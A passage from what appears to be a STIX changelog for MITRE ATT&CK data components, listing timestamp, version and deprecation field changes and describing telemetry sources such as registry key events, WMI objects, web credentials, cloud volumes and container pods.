|---|---|---|
| created | 2021-10-20T15:05:19.275181Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275181Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Contextual data about a cloud volume and activity around it, such as id, type, state, and size |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275161Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275161Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.275118Z | 2021-10-20T15:05:19.275Z |
| modified | 2021-10-20T15:05:19.275118Z | 2021-10-20T15:05:19.275Z |
| Description |
|---|
| Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271827Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271827Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Initial construction of new web credential material (ex: Windows EID 1200 or 4769) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271909Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271909Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.271933Z | 2021-10-20T15:05:19.271Z |
| modified | 2021-10-20T15:05:19.271933Z | 2021-10-20T15:05:19.271Z |
| Description |
|---|
| Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273968Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273968Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273900Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273900Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273923Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273923Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| created | 2021-10-20T15:05:19.273944Z | 2021-10-20T15:05:19.273Z |
| modified | 2021-10-20T15:05:19.273944Z | 2021-10-20T15:05:19.273Z |
| Description |
|---|
| Contextual data about a cluster and activity around it such as name, namespace, age, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_deprecated | True | |
| revoked | False | |
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274804Z | 2022-10-20T20:54:47.331Z |
| created | 2021-10-20T15:05:19.274804Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a container and activity around it such as name, ID, image, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_deprecated | True | |
| x_mitre_attack_spec_version | 2.1.0 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.274884Z | 2022-11-07T19:45:00.000Z |
| created | 2021-10-20T15:05:19.274884Z | 2021-10-20T15:05:19.274Z |
| Description |
|---|
| Contextual data about a pod and activity around it such as name, ID, namespace, or status |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| x_mitre_deprecated | True | |
| x_mitre_attack_spec_version | 2.1.0 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-20T15:05:19.272873Z | 2022-11-07T19:45:00.000Z |
| created | 2021-10-20T15:05:19.272873Z | 2021-10-20T15:05:19.272Z |